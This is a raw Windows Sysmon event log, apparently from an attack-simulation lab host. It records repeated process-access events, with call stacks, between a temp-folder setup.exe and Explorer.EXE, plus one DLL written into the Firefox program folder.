13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-runtime-l1-1-0.dll2021-01-18 13:59:52.224 10341000x800000000000000014501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 